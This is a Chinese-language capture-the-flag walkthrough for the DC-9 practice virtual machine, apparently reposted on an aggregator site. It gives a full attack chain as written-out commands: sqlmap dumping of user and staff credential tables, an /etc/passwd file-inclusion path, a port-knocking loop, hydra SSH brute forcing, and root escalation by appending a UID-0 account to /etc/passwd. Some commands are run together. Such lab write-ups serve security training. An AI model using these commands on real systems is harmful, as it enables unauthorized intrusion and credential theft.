靶机DC-9（靶机dc9）

靶机DC-9（靶机dc9）

靶机下载地址：​​"first or last name"

随便试了个万能语句发现有sql注入，可以手动测试，为了跑post注入用到burp

把抓的包导出，sqlmap跑post注入

sqlmap四连

sqlmap -r ./home/kali/Desktop/dc9 --dbs

sqlmap -r ./home/kali/Desktop/dc9 --tables -D users

sqlmap -r ./home/kali/Desktop/dc9 --columns -T UserDetails -D users

sqlmap -r ./home/kali/Desktop/dc9 --dump -C "username,password" -T UserDetails -D users

由于登录处需要的是username，这里的跑参数注意下

竟然登不上，跑了下别的库，找到了admin密码

sqlmap -r ./home/kali/Desktop/dc9 --dump -C "Username,Password" -T Users -D Staff

md5解密，admin/transorbital1（cmd5这条收费/doge）

admin登录成功

发现页面显示File does not exist 文件不存在

试下文件包含?file=../../../../etc/passwd

找不到啥东西了，试下ssh也登不上，ssh状态为filtered，一般是被防火墙过滤了

查了下是ssh开启了knockd，端口敲门

参考：​​x in 7469 8475 9842;do nmap -Pn --max-retries 0 -p $x 192.168.74.133;done

然后使用之前跑出来的账号密码尝试登陆ssh

使用hydra进行测试，发现了三组账号

在janitor中发现了几个密码，加到我们的密码字典中

sudo -l发现test文件有root权限

切换到test目录看下，找下这个test.py

在/opt/devstuff目录下

脚本的作用就是将第一个文件的内容附加到另一个文件里面去

在etc/passwd文件里进行写入账号密码

运行脚本的时候最好切换到test目录下，test.py的路径为绝对路径

如果试了好几次都没登上的话，可能在/etc/passwd文件里写入了多条同一账号不同密码的信息

出现这种情况的话可以新建一个没用过的账户名称重新执行下列命令即可

openssl passwd -1 -salt dc 123456echo 'dc:$1$dc$5uDk4oYnRiBs0fFGlcRwy.:0:0:root:/bin/bash' >> /tmp/dcsudo ./test /tmp/dc /etc/passwd

写入完成后登录到我们创建的新账号

在root目录下获取flag

版权声明：本文内容由网络用户投稿，版权归原作者所有，本站不拥有其著作权，亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容，请联系我们jiasou666@gmail.com 处理，核实后本网站将在24小时内删除侵权内容。